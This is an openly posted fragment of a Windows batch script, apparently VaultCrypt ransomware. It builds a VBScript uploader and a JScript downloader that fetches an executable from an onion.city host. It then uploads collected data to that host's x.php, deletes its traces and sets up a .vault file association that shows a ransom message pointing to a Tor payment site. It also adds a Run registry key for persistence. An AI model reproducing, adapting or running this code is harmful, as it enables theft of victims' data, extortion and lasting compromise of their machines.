- echo RS^("b"^)="" >> "%temp%\up.vbs"
- echo LenData=Len^(Po^) >> "%temp%\up.vbs"
- echo RS^("b"^).AppendChunk^(StringToMB^(Po^) ^& ChrB^(0^)^) >> "%temp%\up.vbs"
- echo Po=RS^("b"^).GetChunk^(LenData^) >> "%temp%\up.vbs"
- echo RS^("b"^)="" >> "%temp%\up.vbs"
- echo RS^("b"^).AppendChunk^(Pre^) >> "%temp%\up.vbs"
- echo RS^("b"^).AppendChunk^(FileContents^) >> "%temp%\up.vbs"
- echo RS^("b"^).AppendChunk^(Po^) >> "%temp%\up.vbs"
- echo RS.Update >> "%temp%\up.vbs"
- echo FormData=RS^("b"^) >> "%temp%\up.vbs"
- echo RS.Close >> "%temp%\up.vbs"
- echo BuildFormData=FormData >> "%temp%\up.vbs"
- echo End Function >> "%temp%\up.vbs"
- echo Function IEPostBinaryRequest^(URL,FormData,Boundary^) >> "%temp%\up.vbs"
- echo Dim IE: Set IE=CreateObject^("InternetExplorer.Application"^) >> "%temp%\up.vbs"
- echo IE.Navigate URL,,,FormData,_ >> "%temp%\up.vbs"
- echo "Content-Type: multipart/form-data; boundary="+Boundary+vbCrLf >> "%temp%\up.vbs"
- echo do While IE.Busy >> "%temp%\up.vbs"
- echo Wait >> "%temp%\up.vbs"
- echo Loop >> "%temp%\up.vbs"
- echo On Error Resume Next >> "%temp%\up.vbs"
- echo IEPostBinaryRequest=IE.Document.body.innerHTML >> "%temp%\up.vbs"
- echo IE.Quit >> "%temp%\up.vbs"
- echo End Function >> "%temp%\up.vbs"
- echo Function mpFields^(FieldName,FileName,ContentType^) >> "%temp%\up.vbs"
- echo Dim MPtemplate >> "%temp%\up.vbs"
- echo MPtemplate="Content-Disposition: form-data; name=""{field}"";"+_ >> "%temp%\up.vbs"
- echo " filename=""{file}"""+vbCrLf+_ >> "%temp%\up.vbs"
- echo "Content-Type: {ct}"+vbCrLf+vbCrLf >> "%temp%\up.vbs"
- echo Dim Out >> "%temp%\up.vbs"
- echo Out=Replace^(MPtemplate,"{field}",FieldName^) >> "%temp%\up.vbs"
- echo Out=Replace^(Out,"{file}",FileName^) >> "%temp%\up.vbs"
- echo mpFields=Replace^(Out,"{ct}",ContentType^) >> "%temp%\up.vbs"
- echo End Function >> "%temp%\up.vbs"
- echo Function GetFile^(FileName^) >> "%temp%\up.vbs"
- echo Dim Stream: Set Stream=CreateObject^("ADODB.Stream"^) >> "%temp%\up.vbs"
- echo Stream.Type=1 >> "%temp%\up.vbs"
- echo Stream.Open >> "%temp%\up.vbs"
- echo Stream.LoadFromFile FileName >> "%temp%\up.vbs"
- echo GetFile=Stream.Read >> "%temp%\up.vbs"
- echo Stream.Close >> "%temp%\up.vbs"
- echo End Function >> "%temp%\up.vbs"
- echo Function StringToMB^(S^) >> "%temp%\up.vbs"
- echo Dim I,B >> "%temp%\up.vbs"
- echo For I=1 To Len^(S^) >> "%temp%\up.vbs"
- echo B=B ^& ChrB^(Asc^(Mid^(S,I,1^)^)^) >> "%temp%\up.vbs"
- echo Next >> "%temp%\up.vbs"
- echo StringToMB=B >> "%temp%\up.vbs"
- echo End Function >> "%temp%\up.vbs"
- echo Sub Wait^(^) >> "%temp%\up.vbs"
- echo On Error Resume Next >> "%temp%\up.vbs"
- echo End Sub >> "%temp%\up.vbs"
- echo var fp="%%temp%%\\",os="tj2es2lrxelpknfp.onion",WshShell=CreateObject^("WScript.Shell"^),fp=WshShell.ExpandEnvironmentStrings^(fp^);function CreateObject^(b^){return new ActiveXObject^(b^)}function dw^(b,d^){var c=new ActiveXObject^("MSXML2.XMLHTTP"^);c.open^("GET",b,0^);c.send^(^);new ActiveXObject^("Scripting.FileSystemObject"^);var a=new ActiveXObject^("ADODB.Stream"^);a.Open^(^);a.Type=1;a.Write^(c.ResponseBody^);a.Position=0;a.SaveToFile^(d,2^);a.Close^(^)}dw^("http://"+os+".city/p.vlt",""+fp+"ssl.exe"^); > "%temp%\ultra.js"
- wscript.exe //B //Nologo //T:120 "%temp%\ultra.js"
- if exist ssl.exe (
- "%temp%\ssl.exe" -f "%temp%\cookie.vlt"
- wscript.exe //B //Nologo //T:120 "%temp%\up.vbs" "%temp%\cookie.vlt" http://tj2es2lrxelpknfp.onion.city/x.php pf
- del /f /q ssl.exe
- )
- del /f /q "%temp%\ultra.js"
- del /f /q "%temp%\up.vbs"
- del /f /q "%temp%\cookie.vlt"
- attrib -h -r -s "%temp%\ch.vlt"
- del /f /q "%temp%\ch.vlt"
- del /f /q "%temp%\*.gpg"
- del /f /q "%temp%\*.exe"
- echo Y|assoc .vault=Vaulted
- echo Y|ftype "Vaulted"=mshta.exe vbscript:Execute^(^"msgbox ^"^" STORED IN VAULT:^"^"^&vbNewLine^&^"^" %%1^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" Visit for key: http://restoredz4xpmuqr.onion^"^"^&vbNewLine^&vbNewLine^&^"^" [accessible only via Tor Browser: http://torproject.org]^"^",16,^"^"VaultCrypt [Permission Error: No Key]^"^":close^"^)
- echo Y|assoc "Vaulted"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "vltnotify" /t REG_SZ /f /d "mshta %appdata%\VAULT.hta"
- reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tnotify" /f
- del /f /q "%temp%\revault.js"
- reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "vltexec" /f
- start mshta "%temp%\VAULT.hta"
- del /f /q "%temp%\*.dll"
- attrib -s -h -r "%temp%\b.rr"
- del /f /q "%temp%\b.rr" >nul
- del /f /q %0
- :andy
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement